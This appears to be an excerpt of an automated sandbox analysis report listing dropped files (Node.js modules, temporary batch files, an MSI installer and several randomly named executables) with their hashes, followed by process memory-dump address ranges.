SHA5125221c7648f4299234a4637c47d3f1eb5e147014704913bc6fdad91b9b6a6ccc109bced63376b82b046bb5cad708464c76fb452365b76dbf53161914acf8fb11a
-
C:\Program Files\nodejs\node_modules\npm\node_modules\promise-call-limit\LICENSEFilesize
763B
MD57428aa9f83c500c4a434f8848ee23851
SHA1166b3e1c1b7d7cb7b070108876492529f546219f
SHA2561fccd0ad2e7e0e31ddfadeaf0660d7318947b425324645aa85afd7227cab52d7
SHA512c7f01de85f0660560206784cdf159b2bdc5f1bc87131f5a8edf384eba47a113005491520b0a25d3cc425985b5def7b189e18ff76d7d562c434dc5d8c82e90cce
-
C:\Program Files\nodejs\node_modules\npm\node_modules\promise-call-limit\dist\commonjs\package.jsonFilesize
28B
MD556368b3e2b84dac2c9ed38b5c4329ec2
SHA1f67c4acef5973c256c47998b20b5165ab7629ed4
SHA25658b55392b5778941e1e96892a70edc12e2d7bb8541289b237fbddc9926ed51bd
SHA512d662bff3885118e607079fcbeedb27368589bc0ee89f90b9281723fa08bda65e5a08d9640da188773193c0076ec0a5c92624673a6a961490be163e2553d6f482
-
C:\Program Files\nodejs\node_modules\npm\node_modules\promise-call-limit\dist\esm\package.jsonFilesize
26B
MD52324363c71f28a5b7e946a38dc2d9293
SHA17eda542849fb3a4a7b4ba8a7745887adcade1673
SHA2561bf0e53fc74b05f1aade7451fbac72f1944b067d4229d96bae7a225519a250e4
SHA5127437cf8f337d2562a4046246fbfcc5e9949f475a1435e94efbc4b6a55880050077d72692cbc3413e0ccd8f36adf9956a6cc633a2adc85fbff6c4aa2b8edac677
-
C:\Program Files\nodejs\node_modules\npm\node_modules\wrap-ansi\node_modules\emoji-regex\es2015\index.jsFilesize
17KB
MD5cf8f16c1aa805000c832f879529c070c
SHA154cc4d6c9b462ad2de246e28cd80ed030504353d
SHA25677f404d608e2a98f2a038a8aa91b83f0a6e3b4937e5de35a8dae0c23aa9ee573
SHA512a786e51af862470ae46ad085d33281e45795c24897e64b2c4b265302fa9cbfa47b262ec188adbc80d51cfc6ba395b500c0d7f5d343ca4fc2b828eaedba4bd29a
-
C:\Program Files\nodejs\node_modules\npm\node_modules\wrap-ansi\node_modules\emoji-regex\index.jsFilesize
15KB
MD59841536310d4e186a474dfa2acf558cd
SHA133fabbcc5e1adbe0528243eafd36e5d876aaecaa
SHA2565b3c0ac6483d83e6c079f9ffd1c7a18e883a9aaeaedb2d65dd9d5f78153476b9
SHA512b67680a81bb4b62f959ba66476723eb681614925f556689e4d7240af8216a49f0d994c31381bf6a9489151d14ed8e0d0d4d28b66f02f31188059c9b24aaa3783
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Node.js documentation.urlFilesize
168B
MD51c1f6159630c170b596af7c9085f8bb0
SHA1ac26cfe43e10a9f76aee943f9ceff3dc77df29fd
SHA25661403502b3d584ab749a417955dda3d6c956e64109cc4ac4e46e44b462b7c4f0
SHA512f93d2e86c287ed4e50a0c00bcd9594c322cfbd0507bbd191d97c7dd2881850296986139df9580ba1bbaae8abab284335db64c41f6edde441e34fa56b934c3046
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5a5c074e56305e761d7cbc42993300e1c
SHA139b2e23ba5c56b4f332b3607df056d8df23555bf
SHA256e75b17396d67c1520afbde5ecf8b0ccda65f7833c2e7e76e3fddbbb69235d953
SHA512c63d298fc3ab096d9baff606642b4a9c98a707150192191f4a6c5feb81a907495b384760d11cecbff904c486328072548ac76884f14c032c0c1ae0ca640cb5e8
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
240B
MD523a74666eca09082dfa7c1d01b8b3033
SHA1de0cb5504ee37eff9ee041ac3df551eecffa2fcb
SHA25698fba8891d83c849b29c3aaaaa5ac68586db389cff807a8a8a2f23d4b1075041
SHA5127c6b0f46031b7677e7557e60b1df6785b4b8a0a6dc4de13b127886a43036b0925012e9cd14a600cfe8085a0647728a7bd648a2481b972671e85786d92bae5ac2
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD571444def27770d9071039d005d0323b7
SHA1cef8654e95495786ac9347494f4417819373427e
SHA2568438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9
SHA512a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506Filesize
328B
MD54b48e720dc29ccb3fcbbaba1d12e7a99
SHA1e5805bb788befd7160473e958a120ac263d64845
SHA25655c109a0dd7abab420e57ccbbfbb428d3fba63721218daecf8cdbc608008b24a
SHA5120561b0c654df91449b8ab808306d43a451ef5da5ce14e86d0721b6c8d8b0cd3358e3d756786176c9de2e10d2729656cba99d1d56fe23bc79d4111b068cae8467
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749Filesize
330B
MD5638424e9f0865a5e32fb60f42ddb0fea
SHA1b0a07606dcd2a3036eb04abcf6fd5293c6221fa9
SHA256b8973629215df23933ed260d222ee10b5f87202d1e653a27ccd1d8734883eca2
SHA512c143ba5c4b933b9f63855b722c2dda0bfb5192be42013fe9fb5ab3b4278e9cf4434c10e0342bd4d92a3788ad4dee1254af72ef7ec2b081ab05b080ad4227d5b2
-
C:\Users\Admin\AppData\Local\Temp\4333.tmp\4334.tmp\4335.batFilesize
6KB
MD545f6bf2d3c1c47e445439b805929aae8
SHA19d2ba518dd058559bc1d690019bbed79c7cd5f85
SHA256ca7484221dd9645e4608a8195965d941955cfb0f9a373d0870cfd244302ae0fa
SHA512902eb3e38b0be7d795f17a779d0231d0d168fbb8d4ce32b48ba3774a6be9929016b213e9b0082b55e8ac4d2fadadce3184ba8c30f8a025003fec8c8b8e496c64
-
C:\Users\Admin\AppData\Local\Temp\45A4.tmp\45A5.tmp\45A6.batFilesize
1KB
MD52b49f09f8e1785bf2e5c79d0f2bc7389
SHA105d68482ab1db17e11fef25fae270c3b784000ae
SHA256706536e5077fcb4e5e4dd2f77d40f492e7ab6b12065cdc0b450fdd483f436279
SHA512ba8cc161086caa5beb691191ff10f1408e68be79a075d0a653716df497cec762b7767783a0dc91bcba2f260df0fa9ff77e9cf982a364135a18c281e50564bc0a
-
C:\Users\Admin\AppData\Local\Temp\45A4.tmp\nodejs-installer.msiFilesize
25.3MB
MD50df081aa47e7159e585488a161a97466
SHA12dc9a592dbb208624aff11a57f97bea89a315973
SHA25620c578361911d7b0cf153b293b025970eca383a2c802e0df438ac254aaca165d
SHA5122e1b58add6a714281f2ddeb936069c0eb8ce24ae2e440941379c4273afd7f1a96b162d5b88211e8678804bad652e48c99a4993e0e0d0da4d1abd7550d397e836
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a0zkjsse.4jf.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\j1dicjdx.pjl0.exeFilesize
94KB
MD540208a80f2b2155185d8a5bac4b9c367
SHA1d7bf694f6046be8d6a882c86df12c1a35e26ab60
SHA256cf879d5a689376a47310ceb1b95167ccd18ab2073a1356b8d9cecbf04141ae16
SHA5125ff32150c9e62261732c36b4bf2c4f84c58b120b72652b2c22a7591865dd6babbfb741fb75177acd845b072a4ea2a594960a894a2bca4f220c2f897ccd692621
-
C:\Users\Admin\AppData\Roaming\j1dicjdx.pjl1.exeFilesize
423KB
MD5f6ded6a349f5fb25c1440efece6d7828
SHA19b9f5697cb7810ee577253040b92e2915fd2b773
SHA256600def24f6f891e2d72abb3668ad6d35131389e78b0372c8dbfcc757ffd90518
SHA512ea23a86ca3a4298020d967e5aa50c32525d81c8b53993a3bc8a79213a7ca8d71e507dd5aa1ea159cc2b9737f9bf7048f4532419a6b3f84a3190a7db3807834de
-
C:\Users\Admin\AppData\Roaming\j1dicjdx.pjl2.exeFilesize
5.2MB
MD5f55fc8c32bee8f7b2253298f0a0012ba
SHA1574c7a8f3eb378c03f58bc96252769296b20970e
SHA256cf3389f2b5fb30f790542cd05deb5cb3b9bb10f828b8822cce1c0b83da9d6eb9
SHA512c956fb150b34d3928eed545644cbf7914e7db3b079d4f260b9f40bf62aaf4432b4cdfd32c99abc9cd7ca79e66d0751d4a30c47087c39a38865b69dc877ac8f2a
-
C:\Users\Admin\AppData\Roaming\j1dicjdx.pjl3.exeFilesize
89KB
MD5a3b2fcf0c05bb385115894d38c2e6c44
SHA132cf50911381bbec1dad6aec06c2a741bd5d8213
SHA256dbfe02373aa15cc50414561f2bf486b69a11cd9cd50217608c1d18d17e72cae1
SHA512fe58a5d238ac39a269897c176de08d0ad2726bb2ea1636f0d383a1484263e43d0878f0b5f4ebee8a10f3db8e72ab9b36b861e29a6a9b6429fa3e51ec7546dee2
-
C:\Windows\Installer\MSID4D4.tmpFilesize
125KB
MD5a6c7f0c329b28edb3e7f10d115d85c6d
SHA1f36faaf4af452ab0bcd30ef66de7291bcee21264
SHA2568f2e81c6f8ccd01dd1727cf93b82fe35b3abb8cf1ef3045dcd6cdf3346a59d03
SHA512d7fb6997c9ff0dae74634422b8953a276604c0aa27b1e8d9ce4c87220fd469c6eecac6d86da857ff75378c535d2a684b4a120927c62f5267f1bd4dbdc05a72cf
-
C:\Windows\Installer\MSID553.tmpFilesize
390KB
MD580bebea11fbe87108b08762a1bbff2cd
SHA1a7ec111a792fd9a870841be430d130a545613782
SHA256facf518f88cd67afd959c99c3ba233f78a4fbfe7fd3565489da74a585b55e9d1
SHA512a760debb2084d801b6381a0e1dcef66080df03a768cc577b20b8472be87ad8477d59c331159555de10182d87340aa68fe1f3f5d0212048fd7692d85f4da656f6
-
memory/60-131-0x00007FFCAB690000-0x00007FFCAB6A0000-memory.dmpFilesize
64KB
-
memory/60-130-0x000001D1F2E80000-0x000001D1F2EAB000-memory.dmpFilesize
172KB
-
memory/508-141-0x00007FFCAB690000-0x00007FFCAB6A0000-memory.dmpFilesize
64KB
-
memory/508-140-0x0000017060F20000-0x0000017060F4B000-memory.dmpFilesize
172KB
-
memory/612-123-0x00000276334C0000-0x00000276334EB000-memory.dmpFilesize
172KB
-
memory/612-124-0x00007FFCAB690000-0x00007FFCAB6A0000-memory.dmpFilesize
64KB
-
memory/612-122-0x0000027633490000-0x00000276334B4000-memory.dmpFilesize
144KB
-
memory/664-133-0x00007FFCAB690000-0x00007FFCAB6A0000-memory.dmpFilesize
64KB
-
memory/664-129-0x000001053AAF0000-0x000001053AB1B000-memory.dmpFilesize
172KB
-
memory/952-137-0x000001EC919F0000-0x000001EC91A1B000-memory.dmpFilesize
172KB
-
memory/952-138-0x00007FFCAB690000-0x00007FFCAB6A0000-memory.dmpFilesize
64KB
-
memory/1032-87-0x00007FFCEB610000-0x00007FFCEB805000-memory.dmpFilesize
2.0MB
-
memory/1032-41-0x00000000002B0000-0x000000000032E000-memory.dmpFilesize
504KB
-
memory/1032-85-0x0000000003770000-0x0000000003B70000-memory.dmpFilesize
4.0MB
-
memory/1032-86-0x0000000003770000-0x0000000003B70000-memory.dmpFilesize
4.0MB
-
memory/1032-89-0x0000000076170000-0x0000000076385000-memory.dmpFilesize
2.1MB
-
memory/1032-91-0x00000000002B0000-0x000000000032E000-memory.dmpFilesize
504KB
-
memory/1040-143-0x0000020D7BE60000-0x0000020D7BE8B000-memory.dmpFilesize
172KB
-
memory/1040-144-0x00007FFCAB690000-0x00007FFCAB6A0000-memory.dmpFilesize
64KB
-
memory/1064-151-0x00007FFCAB690000-0x00007FFCAB6A0000-memory.dmpFilesize
64KB
-
memory/1064-150-0x0000023643F70000-0x0000023643F9B000-memory.dmpFilesize
172KB
-
memory/1072-154-0x00007FFCAB690000-0x00007FFCAB6A0000-memory.dmpFilesize
64KB
-
memory/1072-153-0x0000022657490000-0x00000226574BB000-memory.dmpFilesize
172KB
-
memory/1188-157-0x00007FFCAB690000-0x00007FFCAB6A0000-memory.dmpFilesize
64KB
-
memory/1188-156-0x000002913E770000-0x000002913E79B000-memory.dmpFilesize
172KB
-
memory/1212-159-0x0000020206250000-0x000002020627B000-memory.dmpFilesize
172KB
-
memory/1212-160-0x00007FFCAB690000-0x00007FFCAB6A0000-memory.dmpFilesize
64KB
-
memory/1276-165-0x00007FFCAB690000-0x00007FFCAB6A0000-memory.dmpFilesize
64KB
-
memory/1276-164-0x0000022368490000-0x00000223684BB000-memory.dmpFilesize
172KB
-
memory/2176-0-0x00007FFCCD683000-0x00007FFCCD685000-memory.dmpFilesize
8KB
-
memory/2176-1-0x00000000009E0000-0x00000000009E8000-memory.dmpFilesize
32KB
-
memory/3944-17-0x00007FFCCD680000-0x00007FFCCE141000-memory.dmpFilesize
10.8MB
-
memory/3944-61-0x00007FFCCD680000-0x00007FFCCE141000-memory.dmpFilesize
10.8MB
-
memory/3944-3-0x000001D4797E0000-0x000001D479802000-memory.dmpFilesize
136KB
-
memory/3944-13-0x00007FFCCD680000-0x00007FFCCE141000-memory.dmpFilesize
10.8MB
-
memory/3944-14-0x00007FFCCD680000-0x00007FFCCE141000-memory.dmpFilesize
10.8MB
-
memory/3944-15-0x00007FFCCD680000-0x00007FFCCE141000-memory.dmpFilesize
10.8MB
-
memory/3944-16-0x00007FFCCD680000-0x00007FFCCE141000-memory.dmpFilesize
10.8MB
-
memory/4280-3607-0x000001D5F8590000-0x000001D5F8D36000-memory.dmpFilesize
7.6MB
-
memory/4392-119-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/4392-115-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/4392-117-0x00007FFCEA280000-0x00007FFCEA33E000-memory.dmpFilesize
760KB
-
memory/4392-110-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/4392-111-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/4392-113-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/4392-112-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/4392-116-0x00007FFCEB610000-0x00007FFCEB805000-memory.dmpFilesize
2.0MB
-
memory/4516-90-0x0000000000C40000-0x0000000000C49000-memory.dmpFilesize
36KB
-
memory/4516-96-0x0000000076170000-0x0000000076385000-memory.dmpFilesize
2.1MB
-
memory/4516-93-0x00000000028C0000-0x0000000002CC0000-memory.dmpFilesize
4.0MB
-
memory/4516-94-0x00007FFCEB610000-0x00007FFCEB805000-memory.dmpFilesize
2.0MB